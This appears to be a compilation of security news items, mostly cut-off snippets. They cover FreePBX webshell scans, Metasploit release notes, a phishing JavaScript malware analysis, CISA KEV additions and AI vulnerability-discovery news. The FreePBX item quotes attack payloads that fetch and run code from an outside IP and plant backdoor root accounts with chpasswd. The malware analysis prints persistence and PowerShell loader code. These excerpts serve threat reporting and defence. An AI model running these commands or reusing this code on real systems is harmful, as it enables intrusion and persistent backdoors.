Security & IT News

Last week, I wrote about attackers scanning for various webshells, hoping to find some that do not require authentication or others that use well-known credentials. But some attackers are paying attention and are deploying webshells with more difficult-to-guess credentials. Today, I noticed some scans for what appears to be the EncystPHP web shell. Fortinet wrote about this webshell back in January. It appears to be a favorite among attackers compromising vulnerable FreePBX systems. The requests I observed look like: GET /admin/modules/phones/ajax.php?md5=cf710203400b8c466e6dfcafcf36a411 Host: [victim ip address]:8000 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive This URL matches what Fortinet reported back in January. The parameter name md5 is a bit misleading. The webshell will just compare the string. The parameter is not necessarily the MD5 hash of a specific password ; any string will work as long as it matches the hard-coded string in the webshell. The string above has the correct length for an MD5 hash, but I wasn't able to find it in common MD5 hash databases. It is very possible that only a few different values are used across different attack campaigns. Many attackers may just copy/paste the code, including this access secret. Currently, these probes originate from %%ip:160.119.76.250%%, an IP address located in the Netherlands. The IP address hosts an unconfigured web server. The same IP address is also probing for various FreePBX vulnerabilities, for example: /restapps/applications.php?linestate=$$LINESTATE$$ user=100 Context: ext-local Action: Originate Channel: Local/DONTCALL@macro-dial Application: system data: wget http://45.95.147.178/k.php -O /tmp/k;bash /tmp/ k This request also matches the scans reported by Fortinet, and it returns the EncystPHP webshell. This version is also adding the following backdoor accounts: echo 'root:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true echo 'hima:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true echo 'asterisk:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true echo 'sugarmaint:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true echo 'spamfilter:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true echo 'asteriskuser:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true echo 'supports:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true echo 'freepbxuser:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true echo 'supermaint:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true echo 'juba:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true If you are using FreePBX, you may want to check for these accounts just to make sure. -- Johannes

Monday is back, and the weekend’s backlog of chaos is officially hitting the fan. We are tracking a critical zero-day that has been quietly living in your PDFs for months, plus some aggressive state-sponsored meddling in infrastructure that is finally coming to light. It is one of those mornings where the gap between a quiet shift and a full-blown incident response is basically

Security teams are flooded with logs, yet every alert demands fast, accurate context. In Verizon’s 2025 Data Breach Investigations Report [1], they analyzed 22,052 security incidents, of which 12,195 (55%) were confirmed breaches, underscoring how much activity teams must sift through to find what matters. In practice, that means dozens of investigations per shift, each requiring fast judgment with incomplete context. A 2024 SANS survey shows that SOC teams report alert volume, limited context, and lack of automation continue to slow investigation and response [2]. Speed suffers. So does consistency. Turn raw logs into a clear narrative AI-Powered Log Summary in Rapid7 Incident Command transforms raw log data into a clear, concise narrative directly within the investigation workflow. Analysts see what happened, why it matters, and what to do next in seconds, not minutes. Instead of decoding logs line by line, analysts get: Instant identification of who initiated the activity. Fast understanding of exactly which actions occurred. Clarity into when and where events unfolded. Connectivity into why that behavior matters. Analysts stay grounded in the original data, but they no longer have to fight through it to find answers. The summary provides immediate orientation and focus, keeping their focus on what to do next. Built for real SOC workflows Figure 1: AI-Powered Log Summary Endpoint Activity Detail ⠀ AI-Powered Log Summary is embedded directly into the log search workflow. No pivoting, and no context switching. With a single action, analysts generate a contextual summary tailored to their results in seconds. That means faster investigations without breaking flow. Summaries can be shared with teammates or leadership to communicate findings quickly, without rewriting technical details into plain language. Everyone stays aligned on what happened and what comes next. AI integration in action Rapid7 leverages the best available technology to protect our customers' attack surfaces. Our mission drives us to keep abreast of the latest AI advancements to deliver optimal value to customers while effectively managing the inherent risks of the technology. Integrating AI into our core processes enhances our operational security and underscores our commitment to ethical innovation. At Rapid7, we are dedicated to leading responsibly in the AI space, ensuring that our technological advancements positively contribute to our customers, company, and society. Read more about how our TRiSM (Trust, Risk, and Security Management) is a foundational strategy that guides us in navigating the intricate landscape of AI with confidence and security. Less noise, more impact By reducing time spent parsing logs, teams can focus on what matters: containment, remediation, and proactive threat hunting. Figure 2: AI-Powered Log Summary Web Proxy Detail ⠀ This brings analysts: Faster triage and investigations. More consistent analysis across shifts. Lower cognitive load during high-

p CISA has added seven new vulnerabilities to its a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" data-entity-type="node" data-entity-uuid="79453b83-86b9-4e2f-b1ec-abf73c6eb291" data-entity-substitution="canonical" title="Known Exploited Vulnerabilities Catalog" Known Exploited Vulnerabilities (KEV) Catalog /a , based on evidence of active exploitation. /p ul li a href="https://www.cve.org/CVERecord?id=CVE-2012-1854" target="_blank" CVE-2012-1854 /a Microsoft Visual Basic for Applications Insecure Library Loading Vulnerability /li li a href="https://www.cve.org/CVERecord?id=CVE-2020-9715" target="_blank" CVE-2020-9715 /a Adobe Acrobat Use-After-Free Vulnerability /li li a href="https://www.cve.org/CVERecord?id=CVE-2023-21529" target="_blank" CVE-2023-21529 /a Microsoft Exchange Server Deserialization of Untrusted Data Vulnerability /li li a href="https://www.cve.org/CVERecord?id=CVE-2023-36424" target="_blank" CVE-2023-36424 /a Microsoft Windows Out-of-Bounds Read Vulnerability /li li a href="https://www.cve.org/CVERecord?id=CVE-2025-60710" target="_blank" CVE-2025-60710 /a Microsoft Windows Link Following Vulnerability /li li a href="https://www.cve.org/CVERecord?id=CVE-2026-21643" target="_blank" CVE-2026-21643 /a Fortinet SQL Injection Vulnerability /li li a href="https://www.cve.org/CVERecord?id=CVE-2026-34621" target="_blank" CVE-2026-34621 /a Adobe Acrobat and Reader Prototype Pollution Vulnerability /li /ul p These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. /p p a href="https://www.cisa.gov/binding-operational-directive-22-01" Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities /a established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the a href="https://www.cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf" BOD 22-01 Fact Sheet /a for more information. /p p Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" data-entity-type="node" data-entity-uuid="79453b83-86b9-4e2f-b1ec-abf73c6eb291" data-entity-substitution="canonical" title="Known Exploited Vulnerabilities Catalog" KEV Catalog vulnerabilities /a as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the a href="https://www.cisa.gov/known-exploited-vulnerabilities" data-entity-type="node" data-entity-uuid="f2adba9a-0404-494c-a90c-4363a4a

Anthropic restricted its Mythos Preview model last week after it autonomously found and exploited zero-day vulnerabilities in every major operating system and browser. Palo Alto Networks' Wendi Whitmore warned that similar capabilities are weeks or months from proliferation. CrowdStrike's 2026 Global Threat Report puts average eCrime breakout time at 29 minutes. Mandiant's M-Trends

OpenAI revealed a GitHub Actions workflow used to sign its macOS apps led to the download of the malicious Axios library on March 31, but noted that no user data or internal system was compromised. "Out of an abundance of caution, we are taking steps to protect the process that certifies our macOS applications are legitimate OpenAI apps," OpenAI said in a post last week. "We found no

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

A critical pre-authentication remote code execution (RCE) vulnerability in Marimo is now under active exploitation, leveraged for credential theft. [...]

An international law enforcement action led by the U.K.'s National Crime Agency (NCA) has identified over 20,000 victims of cryptocurrency fraud across Canada, the United Kingdom, and the United States. [...]

Hungarian domestic intelligence, the national police in El Salvador, and several U.S. law enforcement and police departments have been attributed to the use of an advertising-based global geolocation surveillance system called Webloc. The tool was developed by Israeli company Cobwebs Technologies and is now sold by its successor Penlink after the two firms merged in July 2023

OpenAI has rolled out a new Pro subscription that costs $100 and is in line with Claude's pricing, which also has a $100 subscription, in addition to the $200 Max monthly plan. [...]

Speedup Improvements of MSFVenom & New Modules This week, we have added new modules to Metasploit Framework targeting Cisco Catalyst SD-WAN controllers and osTicket as well as updates and improvements to Windows service-for-user persistence, and LDAP/ADCS-related modules to automatically report related services resulting in an improved data stream, which can be queried by using the services command. We also landed an improvement to msfvenom’s bootup time, thanks to bcoles , resulting in an approximate two-times speedup. New module content (4) AD/CS Authenticated Web Enrollment Services Module Authors: Spencer McIntyre, bwatters-r7, and jhicks-r7 Type: Auxiliary Pull request: #20752 contributed by bwatters-r7 Path: admin/http/web_enrollment_cert Description: This adds a new auxiliary/admin/http/web_enrollment_cert modules that allows certificates to be issued from an Active Directory Certificate Services Web Enrollment portal. Its usage is the same as the auxiliary/admin/http/icpr_cert module but enables operators to issue certificates when the web enrollment portal is accessible but the MS-ICPR service is not. Cisco Catalyst SD-WAN Controller Authentication Bypass Author: sfewer-r7 Type: Auxiliary Pull request: #21158 contributed by sfewer-r7 Path: admin/networking/cisco_sdwan_auth_bypass AttackerKB reference: CVE-2026-20127 Description: This adds an auxiliary module to exploit an authentication bypass vulnerability, CVE-2026-20127, affecting Cisco Catalyst SD-WAN Controller. Recently exploited in the wild as a zero-day. osTicket Arbitrary File Read via PHP Filter Chains in mPDF Authors: Arkaprabha Chakraborty @t1nt1nsn0wy and HORIZON3.ai Team Type: Auxiliary Pull request: #20948 contributed by ArkaprabhaChakraborty Path: gather/osticket_arbitrary_file_read AttackerKB reference: CVE-2026-22200 Description: This adds an auxiliary module to exploit, CVE-2026-22200, an authenticated file read vulnerability in osTicket. Windows Service for User (S4U) Scheduled Task Persistence - Event Trigger Authors: Brandon McCann "zeknox" [email protected] , Thomas McCarthy "smilingraccoon" [email protected] , and h00die Type: Exploit Pull request: #20814 contributed by h00die Path: windows/persistence/service_for_user/event Description: Updates the Windows service-for-user persistence technique. Enhancements and features (5) #20973 from bitstr3m-48 - This release enables command execution for non-interactive HWBridge sessions via the sessions -c flag. Additionally, the hwbridge/connect module now preserves parsed JSON error bodies from failed HTTP responses, which improves error messaging. #20977 from g0tmi1k - This updates the exploit/unix/webapp/php_eval module to have a FORMDATA datastore option, which adds HTTP POST-request support and makes the HEADERS datastore option consistent with other modules. #20979 from g0tmi1k - This updates the exploit/unix/webapp/php_include module with additional datastore options and make its usage more consistent with

A financially motivated threat actor tracked as Storm-2755 is stealing Canadian employees' salary payments after hijacking their accounts in payroll pirate attacks. [...]

While much of the discussion on AI security centers around protecting ‘shadow’ AI and GenAI consumption, there's a wide-open window nobody's guarding: AI browser extensions. A new report from LayerX exposes just how deep this blind spot goes, and why AI extensions may be the most dangerous AI threat surface in your network that isn't on anyone's

Google says Gmail end-to-end encryption (E2EE) is now available on all Android and iOS devices, allowing enterprise users to read and compose emails without additional tools. [...]

Google has made Device Bound Session Credentials (DBSC) generally available to all Windows users of its Chrome web browser, months after it began testing the security feature in open beta. The public availability is currently limited to Windows users on Chrome 146, with macOS expansion planned in an upcoming Chrome release. "This project represents a significant

A critical security vulnerability in Marimo, an open-source Python notebook for data science and analysis, has been exploited within 10 hours of public disclosure, according to findings from Sysdig. The vulnerability in question is CVE-2026-39987 (CVSS score: 9.3), a pre-authenticated remote code execution vulnerability impacting all versions of Marimo prior to and including

I spotted an interesting piece of JavaScript code that was delivered via a phishing email in a RAR archive. The file was called cbmjlzan.JS (SHA256:a8ba9ba93b4509a86e3d7dd40fd0652c2743e32277760c5f7942b788b74c5285) and is only identified as malicious by 15 AV s on VirusTotal[ 1 ]. The file is pretty big (10MB) and contains a copy of the AsmDB project lib[ 2 ]. The purpose is unknown. As usual with JavaScript, the file is pretty well obfuscated and contains UTF characters (supported on Windows) but, when you scrool a bit, some code is disclosed: The script is a Windows-flavor JavaScript and uses ActiveXObject, Microsoft.XMLDOM, ADODB.Stream. It copies itself and implements persistence (through a scheduled task): function FDAWE(x) { return x.split('').reverse().join(''); } var scriptName = WScript['ScriptName']; var urlName = ThreeChars(scriptName) + '.url'; var publicUrl = 'C:\\Users\\Public\\' + urlName; var copiedScript = 'C:\\Users\\Public\\Libraries\\' + scriptName; var fso = new ActiveXObject('Scripting.FileSystemObject'); if (!fso.FileExists(copiedScript)) { if (LOUU...ONIA.split('').join('') === 'YESSSSSSSS') { fso.CopyFile(scriptName, copiedScript); var shell = new ActiveXObject('WScript.Shell'); var cmd = 'cmd /c schtasks /create /sc minute /mo 15 /tn ' + scriptName + ' /tr ' + copiedScript; shell.Run(cmd); } } Three files are dropped in C:\Users\Public: Brio.png Orio.png Xrio.png These aren t pictures, they are used by the PowerShell script executed after implementing persistence: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Noexit -nop -c iex([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(( __REMOVED__ '.Replace('VFHDVXDJCF',''))))) The PowerShell is even documented and has multiple purposes. First, the file Xrio.png is processed. It contains AES encrypted data: $inputBase64FilePath = C:\Users\PUBLIC\Xrio.png $aes_var = [System.Security.Cryptography.Aes]::Create() $aes_var.Mode = [System.Security.Cryptography.CipherMode]::CBC $aes_var.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $aes_var.Key = [System.Convert]::FromBase64String('XctflJI8B7Qo2dA6FbwuHYAjjzjViSx3hThThXX1QUY=') $aes_var.IV = [System.Convert]::FromBase64String('eb8a/RvZf2ltVDo2satMKg==') $base64String = [System.IO.File]::ReadAllText($inputBase64FilePath) $encryptedBytes = [System.Convert]::FromBase64String($base64String) $memoryStream = [System.IO.MemoryStream]::new() $memoryStream.Write($encryptedBytes, 0, $encryptedBytes.Length) $memoryStream.Position = 0 # Reset the position for reading $decryptor = $aes_var.CreateDecryptor() $cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Read) $streamReader = New-Object System.IO.StreamReader($cryptoStream) $decryptedString = $streamReader.ReadToEnd() $cryptoS

Threat actors using a previously undocumented phishing-as-a-service (PhaaS) platform called "VENOM" are targeting credentials of C-suite executives across multiple industries. [...]

Anthropic’s Project Glasswing matters because it offers an early look at how quickly software flaws may soon be found, validated, and potentially turned into viable attack paths, even if that capability is currently limited to a closed partner program. Anthropic says its restricted Claude Mythos Preview model has already identified thousands of high-severity vulnerabilities, including flaws in major operating systems and browsers, and in some cases developed related exploits autonomously. Some early coverage has emphasized the risks and need for restraint in deploying capabilities like this, and for most organizations, it won’t immediately change day-to-day security operations. What it does offer is a signal of where the industry may be heading: a future where discovery moves faster, and where the pressure shifts to everything that follows, including prioritization, remediation, validation, and response. Glasswing feels less like the storm itself and more like the first sign that the radar is getting better faster than the emergency plan. How well can we handle what comes next? What is Project Glasswing? Project Glasswing is Anthropic’s new defensive security initiative built around Claude Mythos Preview, a model the company is not releasing publicly because of its cyber capabilities. Anthropic says the preview is being provided to a limited set of organizations, including AWS, Apple, Broadcom, Cisco, CrowdStrike, Google, JPMorganChase, the Linux Foundation, Microsoft, Nvidia, and Palo Alto Networks, with access also extended to more than 40 additional organizations. Anthropic has also committed up to $100 million in usage credits and additional support for open-source security work. That makes this more than another AI feature release. Anthropic is effectively signaling two things at once. First, there is a meaningful backlog of serious, undisclosed vulnerabilities still out there. Second, capabilities like this are sensitive enough that broad public release would be irresponsible right now. For security leaders, the message is not that AI replaces human researchers. It is that AI is becoming materially more useful in vulnerability research, and defenders should be thinking now about how they will handle what comes next. Why this matters to vulnerability management It would be easy to read this as a story about faster vulnerability discovery alone. That misses the more important point. If Anthropic’s claims are directionally right, the immediate pressure does not land on discovery alone. It lands on everything downstream of discovery: asset context, exploitability analysis, ownership, compensating controls, patching, exception handling, validation, and detection coverage. In other words, the harder part of security becomes more obvious. That matters because most enterprise programs do not struggle to generate findings. They struggle to decide which findings matter first, who should act, what can wait, and whether remediation actually reduced exp